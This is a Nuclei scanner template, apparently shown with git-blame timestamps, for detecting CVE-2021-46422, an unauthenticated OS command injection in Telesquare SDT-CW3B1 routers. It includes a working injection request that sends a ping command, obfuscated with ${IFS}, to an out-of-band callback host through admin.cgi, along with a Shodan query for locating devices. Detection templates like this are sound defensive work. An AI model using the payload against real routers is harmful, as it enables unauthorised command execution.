2022-05-18 08:01:57 +00:00
id : CVE-2021-46422
info :
2022-05-18 20:58:07 +00:00
name : SDT-CW3B1 1.1.0 - OS Command Injection
2022-05-27 05:22:24 +00:00
author : badboycxcc,prajiteshsingh
2022-05-18 08:55:27 +00:00
severity : critical
description : |
Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the target system.
2023-09-06 12:09:01 +00:00
remediation : |
Upgrade to a patched version of SDT-CW3B1 or apply the vendor-supplied patch to mitigate this vulnerability.
2022-05-18 08:40:28 +00:00
reference :
2022-05-18 08:01:57 +00:00
- https://www.exploit-db.com/exploits/50936
2022-05-18 20:58:07 +00:00
- https://drive.google.com/drive/folders/1YJlVlb4SlTEGONzIjiMwd2P7ucP_Pm7T?
- https://nvd.nist.gov/vuln/detail/CVE-2021-46422
2022-05-18 21:10:42 +00:00
- https://drive.google.com/drive/folders/1YJlVlb4SlTEGONzIjiMwd2P7ucP_Pm7T?usp=sharing
2023-07-11 19:49:27 +00:00
- http://packetstormsecurity.com/files/167201/SDT-CW3B1-1.1.0-Command-Injection.html
2022-05-18 08:01:57 +00:00
classification :
2022-05-18 08:55:27 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
2022-05-18 08:01:57 +00:00
cve-id : CVE-2021-46422
2022-05-18 08:55:27 +00:00
cwe-id : CWE-78
2024-01-14 13:49:27 +00:00
epss-score : 0.95223
epss-percentile : 0.99177
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:o:telesquare:sdt-cs3b1_firmware:1.1.0:*:*:*:*:*:*:*
2022-05-18 08:40:28 +00:00
metadata :
2023-06-04 08:13:42 +00:00
verified : true
2023-09-06 12:09:01 +00:00
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : telesquare
product : sdt-cs3b1_firmware
2023-09-06 12:09:01 +00:00
shodan-query : html:"SDT-CW3B1"
2024-01-14 09:21:50 +00:00
tags : cve2021,cve,packetstorm,telesquare,rce,router,injection,edb
2022-05-18 08:40:28 +00:00
variables :
2022-05-27 05:22:24 +00:00
cmd : "ping${IFS}-c${IFS}1${IFS}{{interactsh-url}}"
2022-05-18 08:01:57 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-05-18 08:01:57 +00:00
- method : GET
path :
2022-05-18 08:40:28 +00:00
- "{{BaseURL}}/cgi-bin/admin.cgi?Command=sysCommand&Cmd={{cmd}}"
2022-05-18 08:01:57 +00:00
2022-05-27 05:22:24 +00:00
matchers-condition : and
2022-05-18 08:01:57 +00:00
matchers :
2022-05-27 05:22:24 +00:00
- type : word
2022-05-18 08:01:57 +00:00
part : body
2022-05-27 05:22:24 +00:00
words :
- "<CmdResult>"
- type : word
name : http
2023-07-11 19:49:27 +00:00
part : interactsh_protocol
2022-05-27 05:22:24 +00:00
words :
- "dns"
2024-01-26 08:31:11 +00:00
# digest: 4a0a00473045022100e11a88a4b26152135ded5fb3d43457e99d702c2f07c913b3f8c7f6ff7e03094602207d7fd385be60203492b63db0738f9e09e8eacff8dbddf5d85e28caffd5cdc4ab:922c64590222798bb761d5b6d8e72950